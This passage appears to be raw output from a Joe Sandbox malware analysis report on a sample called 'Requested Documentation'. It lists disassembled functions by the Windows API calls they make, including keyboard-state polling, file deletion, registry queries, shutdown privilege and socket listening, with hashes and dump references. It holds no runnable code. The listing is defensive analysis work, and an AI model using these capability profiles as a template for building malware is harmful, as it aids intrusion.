                                                                              • _wcscmp.LIBCMT ref: 009EF1BC
                                                                              • _wcscmp.LIBCMT ref: 009EF1D3
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EF1E5
                                                                              • SetCurrentDirectoryW.KERNEL32(00A38920), ref: 009EF203
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009EF20D
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF21A
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF22C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 1824444939-438819550
                                                                              • Opcode ID: bf237d02fd55ab1ce3d87dbe49ec39b20d6221b2bf15e051758bce5d3b9ea5f3
                                                                              • Instruction ID: 22667d7109d56e8fde4d3c4f53d683ea09f93a2923763a6c32c4d8dc28d35c2c
                                                                              • Opcode Fuzzy Hash: bf237d02fd55ab1ce3d87dbe49ec39b20d6221b2bf15e051758bce5d3b9ea5f3
                                                                              • Instruction Fuzzy Hash: 5631C43650425DBEDF21EBA5EC69BEE77ACAF89360F100172F914A2190DB30DE46CA54
                                                                              Function 009EA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009EA20F
                                                                              • __swprintf.LIBCMT ref: 009EA231
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 009EA26E
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009EA293
                                                                              • _memset.LIBCMT ref: 009EA2B2
                                                                              • _wcsncpy.LIBCMT ref: 009EA2EE
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009EA323
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009EA32E
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 009EA337
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009EA341
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 2733774712-3457252023
                                                                              • Opcode ID: 3de5c90a64b6208fe9fbbb37278f01eea7bd4ce641001202cac3f752c0c27373
                                                                              • Instruction ID: ff243a4d335adb716eb38cf0303f9b06b381e597722f38417e0f45fc3216cf39
                                                                              • Opcode Fuzzy Hash: 3de5c90a64b6208fe9fbbb37278f01eea7bd4ce641001202cac3f752c0c27373
                                                                              • Instruction Fuzzy Hash: 0031067190024AAFDB21DFA1DC49FEB37BCEF89700F1040B6F608E6160E770AA458B65
                                                                              Function 009D7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009D8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D821E
                                                                                • Part of subcall function 009D8202: GetLastError.KERNEL32(?,009D7CE2,?,?,?), ref: 009D8228
                                                                                • Part of subcall function 009D8202: GetProcessHeap.KERNEL32(00000008,?,?,009D7CE2,?,?,?), ref: 009D8237
                                                                                • Part of subcall function 009D8202: HeapAlloc.KERNEL32(00000000,?,009D7CE2,?,?,?), ref: 009D823E
                                                                                • Part of subcall function 009D8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D8255
                                                                                • Part of subcall function 009D829F: GetProcessHeap.KERNEL32(00000008,009D7CF8,00000000,00000000,?,009D7CF8,?), ref: 009D82AB
                                                                                • Part of subcall function 009D829F: HeapAlloc.KERNEL32(00000000,?,009D7CF8,?), ref: 009D82B2
                                                                                • Part of subcall function 009D829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009D7CF8,?), ref: 009D82C3
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009D7D13
                                                                              • _memset.LIBCMT ref: 009D7D28
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009D7D47
                                                                              • GetLengthSid.ADVAPI32(?), ref: 009D7D58
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 009D7D95
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009D7DB1
                                                                              • GetLengthSid.ADVAPI32(?), ref: 009D7DCE
                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009D7DDD
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 009D7DE4
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009D7E05
                                                                              • CopySid.ADVAPI32(00000000), ref: 009D7E0C
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009D7E3D
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009D7E63
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009D7E77
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3996160137-0
                                                                              • Opcode ID: 86ef76815959252559b49089bc5d6cfe5c0c22fd03ce56e665aa98e0d85802af
                                                                              • Instruction ID: 2472fc386ef4169045ba8648520f3f3d3d9c1d4ab64e151527e256c0cf74c447
                                                                              • Opcode Fuzzy Hash: 86ef76815959252559b49089bc5d6cfe5c0c22fd03ce56e665aa98e0d85802af
                                                                              • Instruction Fuzzy Hash: 57613E71944209AFDF10DF94DC85AEEBB79FF44300F04816AE915A6392EB319A16CB60
                                                                              Function 009966E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                              • API String ID: 0-4052911093
                                                                              • Opcode ID: 56fc43d7e6af1e4c8b8cc74a6df1994bff08d7c85d0956ebfc3d177d65097a88
                                                                              • Instruction ID: 7861a40aa62ba646e6341d933f736583900bd72f7f3ba270fc74548b4b9ad977
                                                                              • Opcode Fuzzy Hash: 56fc43d7e6af1e4c8b8cc74a6df1994bff08d7c85d0956ebfc3d177d65097a88
                                                                              • Instruction Fuzzy Hash: 5F726F76E042199BDF24CF59D8807AEB7B5FF48310F14816AE949EB390E7749981CB90
                                                                              Function 009E001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?), ref: 009E0097
                                                                              • SetKeyboardState.USER32(?), ref: 009E0102
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 009E0122
                                                                              • GetKeyState.USER32(000000A0), ref: 009E0139
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 009E0168
                                                                              • GetKeyState.USER32(000000A1), ref: 009E0179
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 009E01A5
                                                                              • GetKeyState.USER32(00000011), ref: 009E01B3
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 009E01DC
                                                                              • GetKeyState.USER32(00000012), ref: 009E01EA
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 009E0213
                                                                              • GetKeyState.USER32(0000005B), ref: 009E0221
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: ceacbb8289f58cfadfd066a85e085d5afe63e6b157dae7bfa92bbb54b6e63df4
                                                                              • Instruction ID: f0f243c5b54d7a0a1d62f47d933778718f1e452b3a89651172152bde1fc630df
                                                                              • Opcode Fuzzy Hash: ceacbb8289f58cfadfd066a85e085d5afe63e6b157dae7bfa92bbb54b6e63df4
                                                                              • Instruction Fuzzy Hash: 04519A209047C829FB36DBB188557EABFB89F81380F08459A95C65A5C3DAE49FCCC761
                                                                              Function 00A003DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00A00E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A004AC
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A0054B
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A005E3
                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A00822
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A0082F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1240663315-0
                                                                              • Opcode ID: 3c7c44f7aa29eeea1aa5dae7cc6cb02152f4bce5b55b560407c07d0fff394353
                                                                              • Instruction ID: 31c35b0f9a5de6d17f95dabcedc46374ce76a70f8d61a0f047d0b7b65c0b8e27
                                                                              • Opcode Fuzzy Hash: 3c7c44f7aa29eeea1aa5dae7cc6cb02152f4bce5b55b560407c07d0fff394353
                                                                              • Instruction Fuzzy Hash: EDE14D71204204AFCB14DF68D895E6ABBE5FF89314F04856DF84ADB2A1DB31ED05CB92
                                                                              Function 009F4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                              • String ID:
                                                                              • API String ID: 1737998785-0
                                                                              • Opcode ID: d1dcd2732f0709a1341eb14f11909c01456b89f814fa552d1c097112866aad01
                                                                              • Instruction ID: 17b0740d133bd15185f5dec897ad63cb3e1800bcd31c8873391d6719cf651803
                                                                              • Opcode Fuzzy Hash: d1dcd2732f0709a1341eb14f11909c01456b89f814fa552d1c097112866aad01
                                                                              • Instruction Fuzzy Hash: 8E21B4356012189FDB10EF64DC19B7E7BA8EF55310F148026F946AB271CB71AC02CB84
                                                                              Function 009E37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770
                                                                                • Part of subcall function 009E4A31: GetFileAttributesW.KERNEL32(?,009E370B), ref: 009E4A32
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009E38A3
                                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 009E394B
                                                                              • MoveFileW.KERNEL32(?,?), ref: 009E395E
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 009E397B
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009E399D
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 009E39B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                              • String ID: \*.*
                                                                              • API String ID: 4002782344-1173974218
                                                                              • Opcode ID: 6949bbfa55992a6111e3de12e48b654d1a9488cf9535fd7479f8b30c23d3a8fe
                                                                              • Instruction ID: 53650cfafff2054194daaa4d40edcfc160de6b52e6c1d0087ed336fe3c388bca
                                                                              • Opcode Fuzzy Hash: 6949bbfa55992a6111e3de12e48b654d1a9488cf9535fd7479f8b30c23d3a8fe
                                                                              • Instruction Fuzzy Hash: 4F517D3180518DEACF12FBE1D996AEDB779AF54310F604069E406B7292EB216F0DCB61
                                                                              Function 009EF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 009EF440
                                                                              • Sleep.KERNEL32(0000000A), ref: 009EF470
                                                                              • _wcscmp.LIBCMT ref: 009EF484
                                                                              • _wcscmp.LIBCMT ref: 009EF49F
                                                                              • FindNextFileW.KERNEL32(?,?), ref: 009EF53D
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF553
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                              • String ID: *.*
                                                                              • API String ID: 713712311-438819550
                                                                              • Opcode ID: a09fceba5ddf2e44c28fca3460388d64760bb9de88e97025b9d33a2f683a94f5
                                                                              • Instruction ID: 50fc6ac675242649ec2c438622b366c115433f462f4de9d957b345143a434107
                                                                              • Opcode Fuzzy Hash: a09fceba5ddf2e44c28fca3460388d64760bb9de88e97025b9d33a2f683a94f5
                                                                              • Instruction Fuzzy Hash: 7F417B7190424AAFCF11EFA4DC59AEEBBB8FF55310F104466F815A3291EB309E49CB90
                                                                              Function 00995760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: 981e7e6059c8352013a318e966f71d704b83d97080c8abbbf4b3fa08ba683426
                                                                              • Instruction ID: a274b56c264af1ce8fa01417b17965fa974ac9511ed1dc745d187e606dab9ffc
                                                                              • Opcode Fuzzy Hash: 981e7e6059c8352013a318e966f71d704b83d97080c8abbbf4b3fa08ba683426
                                                                              • Instruction Fuzzy Hash: 54126D70A00609DFDF04DFA9D985AEEB7F5FF88310F608529E446E7250EB36A915CB50
                                                                              Function 009E3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770
                                                                                • Part of subcall function 009E4A31: GetFileAttributesW.KERNEL32(?,009E370B), ref: 009E4A32
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009E3B89
                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 009E3BD9
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009E3BEA
                                                                              • FindClose.KERNEL32(00000000), ref: 009E3C01
                                                                              • FindClose.KERNEL32(00000000), ref: 009E3C0A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                              • String ID: \*.*
                                                                              • API String ID: 2649000838-1173974218
                                                                              • Opcode ID: 66fa1ba3b1ab8a1edf580ac17e4d7e8e6202eef79f4144752b5ec59e17172173
                                                                              • Instruction ID: 5db6f6f766cac809ad9d127d6b4d3e67d2b5bbfe1f215acbac329131f52c58b8
                                                                              • Opcode Fuzzy Hash: 66fa1ba3b1ab8a1edf580ac17e4d7e8e6202eef79f4144752b5ec59e17172173
                                                                              • Instruction Fuzzy Hash: C4314B71008385AFC601FF64D8959AFBBA8BE95314F444E2DF8D593291EB21DE09CB63
                                                                              Function 009E51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D882B
                                                                                • Part of subcall function 009D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8858
                                                                                • Part of subcall function 009D87E1: GetLastError.KERNEL32 ref: 009D8865
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 009E51F9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                              • String ID: $@$SeShutdownPrivilege
                                                                              • API String ID: 2234035333-194228
                                                                              • Opcode ID: 96ff13da7f7f058830c792eb5acf52e2eefadeb5a680b7b23b12b7119e7aad75
                                                                              • Instruction ID: c333c794b8982b95ac4931be231ddaf02ca5d29687f699d66f12a2fdebf117a5
                                                                              • Opcode Fuzzy Hash: 96ff13da7f7f058830c792eb5acf52e2eefadeb5a680b7b23b12b7119e7aad75
                                                                              • Instruction Fuzzy Hash: 330170357956466FF73A52659C8AFBB725CD708358F120821FA23E22C3D9501C018190
                                                                              Function 009F6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009F62DC
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F62EB
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 009F6307
                                                                              • listen.WSOCK32(00000000,00000005), ref: 009F6316
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F6330
                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 009F6344
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                              • String ID:
                                                                              • API String ID: 1279440585-0
                                                                              • Opcode ID: 6f5766ece34036f2e6224304d66f2477c28a9ff260deff134f6daa923b499bfc
                                                                              • Instruction ID: 773d2fac65c01014c0710c47ec3785a5b99c642bdf1ced4ee2159f6b90078e56
                                                                              • Opcode Fuzzy Hash: 6f5766ece34036f2e6224304d66f2477c28a9ff260deff134f6daa923b499bfc
                                                                              • Instruction Fuzzy Hash: 9E21A0316002089FCB10EFA4CC45B7EB7A9EF88724F248159FA16A7391C770AD46CB51
                                                                              Function 00995520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
                                                                                • Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01
                                                                              • _memmove.LIBCMT ref: 009D0258
                                                                              • _memmove.LIBCMT ref: 009D036D
                                                                              • _memmove.LIBCMT ref: 009D0414
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
